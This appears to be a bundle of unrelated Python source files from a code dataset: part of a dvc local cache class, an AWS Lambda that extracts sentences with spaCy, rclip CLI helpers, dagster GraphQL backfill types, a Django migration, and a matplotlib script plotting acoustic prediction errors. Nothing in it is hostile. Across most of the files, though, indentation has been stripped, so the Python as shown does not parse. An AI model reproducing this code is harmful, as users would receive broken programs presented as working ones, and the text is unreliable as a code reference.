progress.update_target(title, processed, total)
processed += 1
md5 = self.state.update(path)
dir_info.append(
{self.PARAM_RELPATH: relpath, self.PARAM_CHECKSUM: md5}
)
if bar:
progress.finish_target(title)
# NOTE: sorting the list by path to ensure reproducibility
dir_info = sorted(dir_info, key=itemgetter(self.PARAM_RELPATH))
md5 = dict_md5(dir_info) + self.MD5_DIR_SUFFIX
if self.changed_cache_file(md5):
self.dump_dir_cache(md5, dir_info)
return (md5, dir_info)
def load_dir_cache(self, md5):
path = self.get(md5)
assert self.is_dir_cache(path)
dir_info = self._dir_info.get(md5)
if dir_info:
return dir_info
try:
with open(path, "r") as fd:
d = json.load(fd)
except Exception:
msg = "Failed to load dir cache '{}'"
logger.exception(msg.format(os.path.relpath(path)))
return []
if not isinstance(d, list):
msg = "dir cache file format error '{}' [skipping the file]"
logger.error(msg.format(os.path.relpath(path)))
return []
for info in d:
info["relpath"] = self.to_ospath(info["relpath"])
self._dir_info[md5] = d
return d
def dump_dir_cache(self, md5, dir_info):
path = self.get(md5)
dname = os.path.dirname(path)
assert self.is_dir_cache(path)
assert isinstance(dir_info, list)
if not os.path.isdir(dname):
os.makedirs(dname)
# NOTE: Writing first and renaming after that
# to make sure that the operation is atomic.
tmp = "{}.{}".format(path, str(uuid.uuid4()))
with open(tmp, "w+") as fd:
json.dump(dir_info, fd, sort_keys=True)
move(tmp, path)
@classmethod
def is_dir_cache(cls, cache):
return cache.endswith(cls.MD5_DIR_SUFFIX)
def do_checkout(
self, path_info, checksum, force=False, progress_callback=None
):
path = path_info["path"]
cache = self.get(checksum)
if not self.is_dir_cache(cache):
if self.exists(path_info):
self.safe_remove(path_info, force=force)
self.link(cache, path)
self.state.update_link(path)
if progress_callback:
progress_callback.update(os.path.relpath(path))
return
# Create dir separately so that dir is created
# even if there are no files in it
if not os.path.exists(path):
os.makedirs(path)
dir_relpath = os.path.relpath(path)
logger.debug("Linking directory '{}'.".format(dir_relpath))
dir_info = self.load_dir_cache(checksum)
for processed, entry in enumerate(dir_info):
relpath = entry[self.PARAM_RELPATH]
m = entry[self.PARAM_CHECKSUM]
p = os.path.join(path, relpath)
c = self.get(m)
entry_info = {"scheme": path_info["scheme"], self.PARAM_PATH: p}
entry_checksum_info = {self.PARAM_CHECKSUM: m}
if self.changed(entry_info, entry_checksum_info):
if self.exists(entry_info):
self.safe_remove(entry_info, force=force)
self.link(c, p)
if progress_callback:
progress_callback.update(os.path.relpath(p))
self._discard_working_directory_changes(path, dir_info, force=force)
self.state.update_link(path)
def already_cached(self, path_info):
assert path_info["scheme"] in ["", "local"]
current_md5 = self.state.update(path_info["path"])
if not current_md5:
return False
return not self.changed_cache(current_md5)
def _discard_working_directory_changes(self, path, dir_info, force=False):
working_dir_files = set(path for path in walk_files(path))
cached_files = set(
os.path.join(path, file["relpath"]) for file in dir_info
)
delta = working_dir_files - cached_files
for file in delta:
self.safe_remove({"scheme": "local", "path": file}, force=force)
def _move(self, inp, outp):
# moving in two stages to make the whole operation atomic in
# case inp and outp are in different filesystems and actual
# physical copying of data is happening
tmp = "{}.{}".format(outp, str(uuid.uuid4()))
move(inp, tmp)
move(tmp, outp)
def _save_file(self, path, md5):
assert md5 is not None
cache = self.get(md5)
if self.changed_cache(md5):
self._move(path, cache)
else:
remove(path)
self.link(cache, path)
self.state.update_link(path)
        # we need to update path and cache, since with reflink or copy cache
        # types, moving the original file results in updates on the next
        # executed command, which causes md5 recalculation
self.state.update(path, md5)
self.state.update(cache, md5)
return {self.PARAM_CHECKSUM: md5}
def _save_dir(self, path, md5):
dir_info = self.load_dir_cache(md5)
dir_relpath = os.path.relpath(path)
dir_size = len(dir_info)
bar = dir_size > LARGE_DIR_SIZE
logger.info("Linking directory '{}'.".format(dir_relpath))
for processed, entry in enumerate(dir_info):
relpath = entry[self.PARAM_RELPATH]
m = entry[self.PARAM_CHECKSUM]
p = os.path.join(path, relpath)
c = self.get(m)
if self.changed_cache(m):
self._move(p, c)
else:
remove(p)
self.link(c, p)
self.state.update(p, m)
self.state.update(c, m)
if bar:
progress.update_target(dir_relpath, processed, dir_size)
self.state.update_link(path)
cache = self.get(md5)
self.state.update(cache)
self.state.update(path, md5)
if bar:
progress.finish_target(dir_relpath)
def save(self, path_info, checksum_info):
if path_info["scheme"] != "local":
raise NotImplementedError
path = path_info["path"]
msg = "Saving '{}' to cache '{}'."
logger.info(
msg.format(os.path.relpath(path), os.path.relpath(self.cache_dir))
)
md5 = checksum_info[self.PARAM_CHECKSUM]
if os.path.isdir(path):
self._save_dir(path, md5)
else:
self._save_file(path, md5)
def save_info(self, path_info):
if path_info["scheme"] != "local":
raise NotImplementedError
return {self.PARAM_CHECKSUM: self.state.update(path_info["path"])}
def remove(self, path_info):
if path_info["scheme"] != "local":
raise NotImplementedError
remove(path_info["path"])
def move(self, from_info, to_info):
if from_info["scheme"] != "local" or to_info["scheme"] != "local":
raise NotImplementedError
move(from_info["path"], to_info["path"])
def cache_exists(self, md5s):
assert isinstance(md5s, list)
return list(filter(lambda md5: not self.changed_cache_file(md5), md5s))
def upload(self, from_infos, to_infos, names=None):
names = self._verify_path_args(to_infos, from_infos, names)
for from_info, to_info, name in zip(from_infos, to_infos, names):
if to_info["scheme"] != "local":
raise NotImplementedError
if from_info["scheme"] != "local":
raise NotImplementedError
logger.debug(
"Uploading '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
if not name:
name = os.path.basename(from_info["path"])
makedirs(os.path.dirname(to_info["path"]), exist_ok=True)
tmp_file = tmp_fname(to_info["path"])
try:
copyfile(from_info["path"], tmp_file, name=name)
os.rename(tmp_file, to_info["path"])
except Exception:
logger.exception(
"failed to upload '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
def download(
self,
from_infos,
to_infos,
no_progress_bar=False,
names=None,
resume=False,
):
names = self._verify_path_args(from_infos, to_infos, names)
for to_info, from_info, name in zip(to_infos, from_infos, names):
if from_info["scheme"] != "local":
raise NotImplementedError
if to_info["scheme"] != "local":
raise NotImplementedError
logger.debug(
"Downloading '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
if not name:
name = os.path.basename(to_info["path"])
makedirs(os.path.dirname(to_info["path"]), exist_ok=True)
tmp_file = tmp_fname(to_info["path"])
try:
copyfile(
from_info["path"],
tmp_file,
no_progress_bar=no_progress_bar,
name=name,
)
move(tmp_file, to_info["path"])
except Exception:
logger.exception(
"failed to download '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
continue
def _group(self, checksum_infos, show_checksums=False):
by_md5 = {}
for info in checksum_infos:
md5 = info[self.PARAM_CHECKSUM]
if show_checksums:
by_md5[md5] = {"name": md5}
continue
name = info[self.PARAM_PATH]
branch = info.get("branch")
if branch:
name += "({})".format(branch)
if md5 not in by_md5.keys():
by_md5[md5] = {"name": name}
else:
by_md5[md5]["name"] += " " + name
return by_md5
def status(self, checksum_infos, remote, jobs=None, show_checksums=False):
logger.info("Preparing to collect status from {}".format(remote.url))
title = "Collecting information"
ret = {}
progress.set_n_total(1)
progress.update_target(title, 0, 100)
progress.update_target(title, 10, 100)
ret = self._group(checksum_infos, show_checksums=show_checksums)
md5s = list(ret.keys())
progress.update_target(title, 30, 100)
remote_exists = list(remote.cache_exists(md5s))
progress.update_target(title, 90, 100)
local_exists = self.cache_exists(md5s)
progress.finish_target(title)
self._fill_statuses(ret, local_exists, remote_exists)
self._log_missing_caches(ret)
return ret
def _fill_statuses(self, checksum_info_dir, local_exists, remote_exists):
for md5, info in checksum_info_dir.items():
status = STATUS_MAP[(md5 in local_exists, md5 in remote_exists)]
info["status"] = status
def _get_chunks(self, download, remote, status_info, status, jobs):
title = "Analysing status."
progress.set_n_total(1)
total = len(status_info)
current = 0
cache = []
path_infos = []
names = []
for md5, info in status_info.items():
if info["status"] == status:
cache.append(self.checksum_to_path_info(md5))
path_infos.append(remote.checksum_to_path_info(md5))
names.append(info["name"])
current += 1
progress.update_target(title, current, total)
progress.finish_target(title)
progress.set_n_total(len(names))
if download:
to_infos = cache
from_infos = path_infos
else:
to_infos = path_infos
from_infos = cache
return list(
zip(
to_chunks(from_infos, jobs),
to_chunks(to_infos, jobs),
to_chunks(names, jobs),
)
)
def _process(
self,
checksum_infos,
remote,
jobs=None,
show_checksums=False,
download=False,
):
msg = "Preparing to {} data {} '{}'"
logger.info(
msg.format(
"download" if download else "upload",
"from" if download else "to",
remote.url,
)
)
if download:
func = remote.download
status = STATUS_DELETED
else:
func = remote.upload
status = STATUS_NEW
if jobs is None:
jobs = remote.JOBS
status_info = self.status(
checksum_infos, remote, jobs=jobs, show_checksums=show_checksums
)
chunks = self._get_chunks(download, remote, status_info, status, jobs)
if len(chunks) == 0:
return 0
futures = []
with ThreadPoolExecutor(max_workers=jobs) as executor:
for from_infos, to_infos, names in chunks:
res = executor.submit(func, from_infos, to_infos, names=names)
futures.append(res)
for f in futures:
f.result()
return len(chunks)
def push(self, checksum_infos, remote, jobs=None, show_checksums=False):
return self._process(
checksum_infos,
remote,
jobs=jobs,
show_checksums=show_checksums,
download=False,
)
def pull(self, checksum_infos, remote, jobs=None, show_checksums=False):
return self._process(
checksum_infos,
remote,
jobs=jobs,
show_checksums=show_checksums,
download=True,
)
def _cache_metadata_changed(self):
mtime, size = get_mtime_and_size(self.cache_dir)
inode = get_inode(self.cache_dir)
existing_record = self.state.get_state_record_for_inode(inode)
if existing_record:
cached_mtime, cached_size, _, _ = existing_record
return not (mtime == cached_mtime and size == cached_size)
return True
def _log_missing_caches(self, checksum_info_dict):
missing_caches = [
(md5, info)
for md5, info in checksum_info_dict.items()
if info["status"] == STATUS_MISSING
]
if missing_caches:
missing_desc = "".join(
[
"\nname: {}, md5: {}".format(info["name"], md5)
for md5, info in missing_caches
]
)
msg = (
"Some of the cache files do not exist neither locally "
"nor on remote. Missing cache files: {}".format(missing_desc)
)
logger.warning(msg)
@staticmethod
def _unprotect_file(path):
if System.is_symlink(path) or System.is_hardlink(path):
logger.debug("Unprotecting '{}'".format(path))
tmp = os.path.join(os.path.dirname(path), "." + str(uuid.uuid4()))
            # The order of operations is important here - if some application
            # accessed the file while copyfile is in progress, it would see
            # only part of the file. So the file is first copied under a
            # temporary name, and only then is the original replaced by the
            # new copy.
copyfile(
path,
tmp,
name="Unprotecting '{}'".format(os.path.relpath(path)),
)
remove(path)
os.rename(tmp, path)
else:
logger.debug(
"Skipping copying for '{}', since it is not "
"a symlink or a hardlink.".format(path)
)
os.chmod(path, os.stat(path).st_mode | stat.S_IWRITE)
@staticmethod
def _unprotect_dir(path):
for path in walk_files(path):
RemoteLOCAL._unprotect_file(path)
@staticmethod
def unprotect(path_info):
path = path_info["path"]
if not os.path.exists(path):
raise DvcException(
"can't unprotect non-existing data '{}'".format(path)
)
if os.path.isdir(path):
RemoteLOCAL._unprotect_dir(path)
else:
RemoteLOCAL._unprotect_file(path)
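# Hedged usage sketch (added for illustration, not part of dvc itself): the
# local cache distinguishes directory checksums from file checksums purely by
# the ".dir" suffix, stores entries under <cache_dir>/<md5[0:2]>/<md5[2:]>
# (see RemoteLOCAL.get), and keeps relative paths inside .dir files in POSIX
# form. The checksum below is just the md5 of an empty string, used as a
# placeholder.
def _cache_convention_example():
    file_md5 = "d41d8cd98f00b204e9800998ecf8427e"
    dir_md5 = file_md5 + RemoteLOCAL.MD5_DIR_SUFFIX
    assert not RemoteLOCAL.is_dir_cache(file_md5)
    assert RemoteLOCAL.is_dir_cache(dir_md5)
    assert RemoteLOCAL.unixpath("data\\raw\\file.txt") == "data/raw/file.txt"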
|
the-stack_106_14804
|
import json
import os
import spacy
from helper import S3Helper
from update_event import update_event, get_new_s3_url
def get_file_content(aws_env: dict):
name_path_s3, _ = os.path.splitext(aws_env["objectName"])
txt_path_s3 = name_path_s3 + ".txt"
return S3Helper.readFromS3(aws_env['bucketName'], txt_path_s3,
aws_env['awsRegion'])
def spacy_sentences_extraction(content: str, aws_env: dict):
excluded_pipeline = ["tagger", "ner", "textcat", "parser"]
model_path = "/opt/python/xx_ent_wiki_sm/xx_ent_wiki_sm-2.3.0"
sentence_content = ""
if os.path.isdir(model_path) is False:
model_path = "xx_ent_wiki_sm"
nlp = spacy.load(model_path, disable=excluded_pipeline)
nlp.add_pipe(nlp.create_pipe('sentencizer'))
doc = nlp(content)
print("Pipelines names: ", nlp.pipe_names)
for sent in doc.sents:
sentence = sent.text.replace('\n', ' ')
sentence_content += "{}\n".format(sentence.strip())
S3Helper.writeToS3(sentence_content, aws_env['outputBucket'],
aws_env['outputNameTxt'], aws_env['awsRegion'])
def get_s3_path(path_s3_txt: str) -> str:
folder_output, pdf_output = os.path.split(path_s3_txt)
file_name, ext = os.path.splitext(pdf_output)
txt_file = "sentences_of_{}.txt".format(file_name)
txt_output = os.path.join(folder_output, txt_file)
return txt_output
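# Hedged example (hypothetical object key, not taken from a real event):
# get_s3_path derives the S3 key used for the extracted sentences from the
# input object key. Assumes the POSIX path separator of the Lambda runtime.
def _get_s3_path_example():
    assert get_s3_path("docs/report.pdf") == "docs/sentences_of_report.txt"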
def lambda_handler(event, context):
print("==> Event: {0}".format(json.dumps(event)))
aws_env = {
**event,
"bucketName": os.environ['DOCUMENTS_BUCKET'],
"awsRegion": 'eu-west-1',
"tmpOutput": "/tmp/tmp_sentences.txt",
"outputBucket": os.environ['DOCUMENTS_BUCKET'],
"outputNameTxt": get_s3_path(event['objectName']),
}
content = get_file_content(aws_env)
if content is None:
aws_env['status'] = -1
aws_env['errorMessage'] =\
"File {0} not found in s3 {1}".format(aws_env['objectName'],
aws_env['bucketName'])
return update_event(aws_env, event)
spacy_sentences_extraction(content, aws_env)
print("==> Aws env: {0}".format(json.dumps(aws_env)))
aws_env['status'] = 0
aws_env['errorMessage'] = None
aws_env["s3Url"] = get_new_s3_url(aws_env['s3Url'], "txt", aws_env['outputNameTxt'])
aws_env["contentType"] = "text/txt"
aws_env['objectName'] = aws_env['outputNameTxt']
print("====> NEW PATH: ", aws_env['objectName'])
aws_env["sourceUrl"] = aws_env["s3Url"]
return update_event(aws_env, event)
|
the-stack_106_14805
|
import argparse
import os
import pathlib
import sys
from rclip import config
def get_system_datadir() -> pathlib.Path:
"""
Returns a parent directory path
where persistent application data can be stored.
# linux: ~/.local/share
# macOS: ~/Library/Application Support
# windows: C:/Users/<USER>/AppData/Roaming
"""
home = pathlib.Path.home()
if sys.platform == "win32":
return home / "AppData/Roaming"
elif sys.platform.startswith("linux"):
return home / ".local/share"
elif sys.platform == "darwin":
return home / "Library/Application Support"
raise NotImplementedError(f"'{sys.platform}' is not supported")
def get_app_datadir() -> pathlib.Path:
app_datadir = os.getenv("DATADIR")
if app_datadir:
app_datapath = pathlib.Path(app_datadir)
else:
app_datapath = get_system_datadir() / config.NAME
os.makedirs(app_datapath, exist_ok=True)
return app_datapath
def top_arg_type(arg: str) -> int:
arg_int = int(arg)
if arg_int < 1:
raise argparse.ArgumentTypeError("number of results to display should be >0")
return arg_int
def init_arg_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser()
parser.add_argument("search_dir", help="Directory to search")
parser.add_argument("query")
parser.add_argument("--top", "-t", type=top_arg_type, default=10, help="number of top results to display")
parser.add_argument("--filepath-only", "-f", action="store_true", default=False, help="outputs only filepaths")
parser.add_argument(
"--skip-index", "-n",
action="store_true",
default=False,
help="don't attempt image indexing, saves time on consecutive runs on huge directories",
)
parser.add_argument(
"--exclude-dir",
action="append",
help="dir to exclude from search, can be specified multiple times;"
" adding this argument overrides the default of ('@eaDir', 'node_modules', '.git');"
" WARNING: the default will be removed in v2",
)
return parser
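# Hedged example (not part of rclip itself; the directory and query strings
# are placeholders): parse a typical command line built by init_arg_parser.
def _example_cli_parse():
    parser = init_arg_parser()
    args = parser.parse_args(["~/Pictures", "cat on a sofa", "--top", "3"])
    return args.search_dir, args.query, args.top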
|
the-stack_106_14806
|
import graphene
from dagster import check
from dagster.core.execution.backfill import BulkActionStatus, PartitionBackfill
from dagster.core.storage.pipeline_run import PipelineRunsFilter
from .errors import (
GrapheneInvalidOutputError,
GrapheneInvalidStepError,
GraphenePartitionSetNotFoundError,
GraphenePipelineNotFoundError,
GraphenePythonError,
GrapheneRunConflict,
GrapheneUnauthorizedError,
create_execution_params_error_types,
)
from .pipelines.config import GrapheneRunConfigValidationInvalid
from .util import non_null_list
pipeline_execution_error_types = (
GrapheneInvalidStepError,
GrapheneInvalidOutputError,
GrapheneRunConfigValidationInvalid,
GraphenePipelineNotFoundError,
GrapheneRunConflict,
GrapheneUnauthorizedError,
GraphenePythonError,
) + create_execution_params_error_types
class GrapheneLaunchBackfillSuccess(graphene.ObjectType):
backfill_id = graphene.NonNull(graphene.String)
launched_run_ids = graphene.List(graphene.String)
class Meta:
name = "LaunchBackfillSuccess"
class GrapheneLaunchBackfillResult(graphene.Union):
class Meta:
types = (
GrapheneLaunchBackfillSuccess,
GraphenePartitionSetNotFoundError,
) + pipeline_execution_error_types
name = "LaunchBackfillResult"
class GrapheneCancelBackfillSuccess(graphene.ObjectType):
backfill_id = graphene.NonNull(graphene.String)
class Meta:
name = "CancelBackfillSuccess"
class GrapheneCancelBackfillResult(graphene.Union):
class Meta:
types = (GrapheneCancelBackfillSuccess, GrapheneUnauthorizedError, GraphenePythonError)
name = "CancelBackfillResult"
class GrapheneResumeBackfillSuccess(graphene.ObjectType):
backfill_id = graphene.NonNull(graphene.String)
class Meta:
name = "ResumeBackfillSuccess"
class GrapheneResumeBackfillResult(graphene.Union):
class Meta:
types = (GrapheneResumeBackfillSuccess, GrapheneUnauthorizedError, GraphenePythonError)
name = "ResumeBackfillResult"
class GrapheneBulkActionStatus(graphene.Enum):
REQUESTED = "REQUESTED"
COMPLETED = "COMPLETED"
FAILED = "FAILED"
CANCELED = "CANCELED"
class Meta:
name = "BulkActionStatus"
class GraphenePartitionBackfill(graphene.ObjectType):
class Meta:
name = "PartitionBackfill"
backfillId = graphene.NonNull(graphene.String)
status = graphene.NonNull(GrapheneBulkActionStatus)
numRequested = graphene.NonNull(graphene.Int)
numTotal = graphene.NonNull(graphene.Int)
fromFailure = graphene.NonNull(graphene.Boolean)
reexecutionSteps = non_null_list(graphene.String)
partitionSetName = graphene.NonNull(graphene.String)
timestamp = graphene.NonNull(graphene.Float)
partitionSet = graphene.Field("dagster_graphql.schema.partition_sets.GraphenePartitionSet")
runs = graphene.Field(
non_null_list("dagster_graphql.schema.pipelines.pipeline.GrapheneRun"),
limit=graphene.Int(),
)
error = graphene.Field(GraphenePythonError)
def __init__(self, backfill_job):
self._backfill_job = check.opt_inst_param(backfill_job, "backfill_job", PartitionBackfill)
super().__init__(
backfillId=backfill_job.backfill_id,
partitionSetName=backfill_job.partition_set_origin.partition_set_name,
status=backfill_job.status,
numTotal=len(backfill_job.partition_names),
fromFailure=bool(backfill_job.from_failure),
reexecutionSteps=backfill_job.reexecution_steps,
timestamp=backfill_job.backfill_timestamp,
)
def resolve_runs(self, graphene_info, **kwargs):
from .pipelines.pipeline import GrapheneRun
filters = PipelineRunsFilter.for_backfill(self._backfill_job.backfill_id)
return [
GrapheneRun(r)
for r in graphene_info.context.instance.get_runs(
filters=filters,
limit=kwargs.get("limit"),
)
]
def resolve_numRequested(self, graphene_info):
filters = PipelineRunsFilter.for_backfill(self._backfill_job.backfill_id)
run_count = graphene_info.context.instance.get_runs_count(filters)
if self._backfill_job.status == BulkActionStatus.COMPLETED:
return len(self._backfill_job.partition_names)
checkpoint = self._backfill_job.last_submitted_partition_name
return max(
run_count,
self._backfill_job.partition_names.index(checkpoint) + 1
if checkpoint and checkpoint in self._backfill_job.partition_names
else 0,
)
def resolve_partitionSet(self, graphene_info):
from ..schema.partition_sets import GraphenePartitionSet
origin = self._backfill_job.partition_set_origin
location_name = origin.external_repository_origin.repository_location_origin.location_name
repository_name = origin.external_repository_origin.repository_name
if not graphene_info.context.has_repository_location(location_name):
return None
location = graphene_info.context.get_repository_location(location_name)
if not location.has_repository(repository_name):
return None
repository = location.get_repository(repository_name)
external_partition_sets = [
partition_set
for partition_set in repository.get_external_partition_sets()
if partition_set.name == origin.partition_set_name
]
if not external_partition_sets:
return None
partition_set = external_partition_sets[0]
return GraphenePartitionSet(
external_repository_handle=repository.handle,
external_partition_set=partition_set,
)
def resolve_error(self, _):
if self._backfill_job.error:
return GraphenePythonError(self._backfill_job.error)
return None
class GraphenePartitionBackfillOrError(graphene.Union):
class Meta:
types = (GraphenePartitionBackfill, GraphenePythonError)
name = "PartitionBackfillOrError"
class GraphenePartitionBackfills(graphene.ObjectType):
results = non_null_list(GraphenePartitionBackfill)
class Meta:
name = "PartitionBackfills"
class GraphenePartitionBackfillsOrError(graphene.Union):
class Meta:
types = (GraphenePartitionBackfills, GraphenePythonError)
name = "PartitionBackfillsOrError"
|
the-stack_106_14807
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='fuelclass',
options={'verbose_name_plural': 'fuel classes'},
),
]
|
the-stack_106_14808
|
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
abc=np.load("vp_1_test.npy")
abcd=np.load("vp_2_test.npy")
abcde=np.load("vp_3_test.npy")
abcdef=np.load("vp_2_weightmean_test.npy")
std_vol=106.02265
std_surf=84.2240762
std_rt60=[ 0.7793691,0.7605436,0.6995225, 0.7076664, 0.6420753,0.51794204]
std_abs=[0.100825,0.1172430,0.1002776,0.09108845,0.09378748,0.091663032]
err_1=np.abs(abc[:,0]*std_surf-abc[:,14])
err_2=np.abs(abc[:,1]*std_vol-abc[:,15])
err_3=np.abs(abc[:,2]*std_rt60[0]-abc[:,16])
err_4=np.abs(abc[:,3]*std_rt60[1]-abc[:,17])
err_5=np.abs(abc[:,4]*std_rt60[2]-abc[:,18])
err_6=np.abs(abc[:,5]*std_rt60[3]-abc[:,19])
err_7=np.abs(abc[:,6]*std_rt60[4]-abc[:,20])
err_8=np.abs(abc[:,7]*std_rt60[5]-abc[:,21])
err_9=np.abs(abc[:,8]*std_abs[0]-abc[:,22])
err_10=np.abs(abc[:,9]*std_abs[1]-abc[:,23])
err_11=np.abs(abc[:,10]*std_abs[2]-abc[:,24])
err_12=np.abs(abc[:,11]*std_abs[3]-abc[:,25])
err_13=np.abs(abc[:,12]*std_abs[4]-abc[:,26])
err_14=np.abs(abc[:,13]*std_abs[5]-abc[:,27])
err2_1=np.abs(abcd[:,0]*std_surf-abcd[:,14])
err2_2=np.abs(abcd[:,1]*std_vol-abcd[:,15])
err2_3=np.abs(abcd[:,2]*std_rt60[0]-abcd[:,16])
err2_4=np.abs(abcd[:,3]*std_rt60[1]-abcd[:,17])
err2_5=np.abs(abcd[:,4]*std_rt60[2]-abcd[:,18])
err2_6=np.abs(abcd[:,5]*std_rt60[3]-abcd[:,19])
err2_7=np.abs(abcd[:,6]*std_rt60[4]-abcd[:,20])
err2_8=np.abs(abcd[:,7]*std_rt60[5]-abcd[:,21])
err2_9=np.abs(abcd[:,8]*std_abs[0]-abcd[:,22])
err2_10=np.abs(abcd[:,9]*std_abs[1]-abcd[:,23])
err2_11=np.abs(abcd[:,10]*std_abs[2]-abcd[:,24])
err2_12=np.abs(abcd[:,11]*std_abs[3]-abcd[:,25])
err2_13=np.abs(abcd[:,12]*std_abs[4]-abcd[:,26])
err2_14=np.abs(abcd[:,13]*std_abs[5]-abcd[:,27])
err3_1=np.abs(abcde[:,0]*std_surf-abcde[:,14])
err3_2=np.abs(abcde[:,1]*std_vol-abcde[:,15])
err3_3=np.abs(abcde[:,2]*std_rt60[0]-abcde[:,16])
err3_4=np.abs(abcde[:,3]*std_rt60[1]-abcde[:,17])
err3_5=np.abs(abcde[:,4]*std_rt60[2]-abcde[:,18])
err3_6=np.abs(abcde[:,5]*std_rt60[3]-abcde[:,19])
err3_7=np.abs(abcde[:,6]*std_rt60[4]-abcde[:,20])
err3_8=np.abs(abcde[:,7]*std_rt60[5]-abcde[:,21])
err3_9=np.abs(abcde[:,8]*std_abs[0]-abcde[:,22])
err3_10=np.abs(abcde[:,9]*std_abs[1]-abcde[:,23])
err3_11=np.abs(abcde[:,10]*std_abs[2]-abcde[:,24])
err3_12=np.abs(abcde[:,11]*std_abs[3]-abcde[:,25])
err3_13=np.abs(abcde[:,12]*std_abs[4]-abcde[:,26])
err3_14=np.abs(abcde[:,13]*std_abs[5]-abcde[:,27])
err4_1=np.abs(abcdef[:,0]*std_surf-abcdef[:,14])
err4_2=np.abs(abcdef[:,1]*std_vol-abcdef[:,15])
err4_3=np.abs(abcdef[:,2]*std_rt60[0]-abcdef[:,16])
err4_4=np.abs(abcdef[:,3]*std_rt60[1]-abcdef[:,17])
err4_5=np.abs(abcdef[:,4]*std_rt60[2]-abcdef[:,18])
err4_6=np.abs(abcdef[:,5]*std_rt60[3]-abcdef[:,19])
err4_7=np.abs(abcdef[:,6]*std_rt60[4]-abcdef[:,20])
err4_8=np.abs(abcdef[:,7]*std_rt60[5]-abcdef[:,21])
err4_9=np.abs(abcdef[:,8]*std_abs[0]-abcdef[:,22])
err4_10=np.abs(abcdef[:,9]*std_abs[1]-abcdef[:,23])
err4_11=np.abs(abcdef[:,10]*std_abs[2]-abcdef[:,24])
err4_12=np.abs(abcdef[:,11]*std_abs[3]-abcdef[:,25])
err4_13=np.abs(abcdef[:,12]*std_abs[4]-abcdef[:,26])
err4_14=np.abs(abcdef[:,13]*std_abs[5]-abcdef[:,27])
fig,axs=plt.subplots(7,2,figsize=(10,25))
#ep=10e-5
bplot1=axs[0,0].boxplot([err_9,err2_9,err3_9,err4_9],showmeans=True,vert=True,showfliers=True,patch_artist=True)
axs[0,0].set_xticks([1,2,3,4])
axs[0,0].set_xticklabels(['MN 1 VP','MN 2 VP','MN 3 vp','MN WM'],rotation=45)
axs[0,0].set_ylabel("Abs Err Ab")
axs[0,0].set_title("125hz")
#print(bplot1["fliers"][1].get_data()[1])
bplot2=axs[0,1].boxplot([err_10,err2_10,err3_10,err4_10],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[0,1].set_xticks([1,2,3,4])
axs[0,1].set_xticklabels(['MN 1 VP','MN 2 VP','MN 3 vp','MN WM'],rotation=45)
axs[0,1].set_ylabel("Abs Err Ab")
axs[0,1].set_title("AB Coeff 250hz")
bplot3=axs[1,0].boxplot([err_11,err2_11,err3_11,err4_11],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[1,0].set_xticks([1,2,3,4])
axs[1,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[1,0].set_ylabel("Abs Err Ab")
axs[1,0].set_title("AB Coeff 500hz")
bplot4=axs[1,1].boxplot([err_12,err2_12,err3_12,err4_12],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[1,1].set_xticks([1,2,3,4])
axs[1,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[1,1].set_ylabel("Abs Err Ab")
axs[1,1].set_title("Ab Coeff 1000hz")
bplot5=axs[2,0].boxplot([err_13,err2_13,err3_13,err4_13],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[2,0].set_xticks([1,2,3,4])
axs[2,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[2,0].set_ylabel("Abs Err Ab")
axs[2,0].set_title("Ab Coeff 2000hz")
bplot6=axs[2,1].boxplot([err_14,err2_14,err3_14,err4_14],showmeans=True,vert=True,showfliers=False,patch_artist=True)
axs[2,1].set_xticks([1,2,3,4])
axs[2,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[2,1].set_ylabel("Abs Err Ab")
axs[2,1].set_title("Ab Coeff 4000hz")
out_rt=False
bplot7=axs[3,0].boxplot([err_3,err2_3,err3_3,err4_3],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[3,0].set_xticks([1,2,3,4])
axs[3,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[3,0].set_ylabel("Abs Err Sec")
axs[3,0].set_title("RT 60 125hz")
#print(bplot1["fliers"][1].get_data()[1])
bplot8=axs[3,1].boxplot([err_4,err2_4,err3_4,err4_4],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[3,1].set_xticks([1,2,3,4])
axs[3,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[3,1].set_ylabel("Abs Err Sec")
axs[3,1].set_title("RT 60 250hz")
bplot9=axs[4,0].boxplot([err_5,err2_5,err3_5,err4_5],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[4,0].set_xticks([1,2,3,4])
axs[4,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[4,0].set_ylabel("Abs Err Sec")
axs[4,0].set_title("RT 60 500hz")
bplot10=axs[4,1].boxplot([err_6,err2_6,err3_6,err4_6],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[4,1].set_xticks([1,2,3,4])
axs[4,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[4,1].set_ylabel("Abs Err Sec")
axs[4,1].set_title("RT60 1000hz")
bplot11=axs[5,0].boxplot([err_7,err2_7,err3_7,err4_7],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[5,0].set_xticks([1,2,3,4])
axs[5,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[5,0].set_ylabel("Abs Err Sec")
axs[5,0].set_title("RT 60 2000hz")
